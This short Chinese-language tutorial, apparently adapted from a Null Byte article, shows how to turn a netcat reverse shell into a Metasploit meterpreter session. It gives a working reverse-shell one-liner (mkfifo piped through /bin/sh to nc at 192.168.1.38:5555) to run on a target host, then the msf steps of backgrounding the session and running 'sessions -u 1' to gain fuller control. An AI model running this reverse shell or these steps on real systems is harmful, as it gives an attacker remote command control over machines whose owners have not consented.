https://null-byte.wonderhowto.com/how-to/elevate-netcat-shell-meterpreter-session-for-more-power-control-0193211/
metasploit 中的 meterpreter shell 是一个我们比较喜欢的shell,因为方便我们后续加载各种模块,简直不要太方便
所以我们这次把一个简单的shell升级为 meterpreter shell
攻击机配置msf 监听:
目标主机上直接nc 反弹shell
rm -f /tmp/f; mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.38 5555 > /tmp/f
可以看到现在状态还是一个普通shell,并不是一个tty,现在我们来变个魔术 在这个shell中输入 background 在对话中选择 y 成功将shell放在了后台
我们使用 sessions -u 1
将普通shell提升为 meterpreter shell(创建一个新的shell)
可以看到有一个新的meterpreter shell 产生了,仔细看回显其实可以看出实际上是调用了 post/multi/manage/shell_to_meterpreter
我们进入这个shell来测试一下吧
可以看到成功获取到meterpreter 的shell,这个shell 功能太全了,之前说的命令补全、Ctrl+c 不退出 但是默认不支持 su,ssh等 当然可以使用msf的库来实现了